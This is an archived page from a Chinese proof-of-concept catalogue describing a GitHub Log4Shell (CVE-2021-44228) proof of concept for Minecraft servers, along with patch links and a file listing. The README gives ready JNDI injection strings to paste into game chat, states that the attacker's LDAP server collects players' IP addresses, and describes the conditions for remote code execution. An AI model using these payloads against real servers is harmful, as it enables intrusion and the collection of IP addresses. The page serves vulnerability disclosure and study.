POC详情: cc5f54465de0ca6dcfd483a2c173fabff25b64c1

来源
https://github.com/Sma-Das/Log4j-PoC
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
An educational Proof of Concept for the Log4j Vulnerability (CVE-2021-44228) in Minecraft
介绍
# Proof of Concept for Log4j (CVE-2021-44228)

## Disclaimer

This project is only for educational purposes.

---

## Introduction

This is a proof of concept of the log4j rce adapted from HyCraftHD.

Here are some links for the CVE-2021-44228:
- https://www.lunasec.io/docs/blog/log4j-zero-day
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://github.com/apache/logging-log4j2/pull/608
- https://www.youtube.com/watch?v=JPGola6BamU

This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is **[2.15.0](https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/2.15.0)** which fixes the exploit.

## Demonstration with minecraft (which uses log4j2)

- Details for the impact on minecraft are listed here: https://twitter.com/slicedlime/status/1469150993527017483
- Article from minecraft is here: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
- Fixed minecraft forge versions: https://twitter.com/gigaherz/status/1469331288368861195
- Detailed article from minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
- Fixed minecraft fabric versions: https://twitter.com/slicedlime/status/1469192689904193537
- Fixed minecraft paper versions: https://twitter.com/aurora_smiles_/status/1469205803232026625
- Fixed minecraft spigot versions: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
- Fixed minecraft sponge versions: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

### Lag or sending serialized data 

- Paste ``${jndi:ldap://127.0.0.1/e}`` in the chat. If there is an open socket on port ``389`` logj4 tries to connect and blocks further communiction until a timeout occurs.
- When using this proof of concept exploit, the log in the console will log ``THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!`` which is a serialized string object from the ldap server.

![image](https://user-images.githubusercontent.com/7681220/145529175-b6f88cf0-67d0-450b-a834-87942202d594.png)

- Additionally the malicious ldap server receives every ip address where the message is logged. This means that ip adresses of players on a server can be collected which this exploit.

### RCE

- Paste ``${jndi:ldap://127.0.0.1/exe}`` in the chat. If ``-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`` is set to true the remote code execution will happen.

![image](https://user-images.githubusercontent.com/7681220/145529797-a3952c3e-c81e-4e91-b383-490688736f9c.png)

- Fortunately modern jdks disable remote class loading by default. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
- Old versions may still allow this!!
文件快照

 [4.0K]  /data/pocs/cc5f54465de0ca6dcfd483a2c173fabff25b64c1
├── [ 227]  build.gradle
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 58K]  gradle-wrapper.jar
│       └── [ 200]  gradle-wrapper.properties
├── [5.6K]  gradlew
├── [2.6K]  gradlew.bat
├── [1.0K]  LICENSE
├── [2.7K]  README.md
├── [  36]  settings.gradle
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            ├── [3.7K]  Exploit.java
            └── [4.0K]  rofl
                └── [ 299]  ROFL.java

6 directories, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。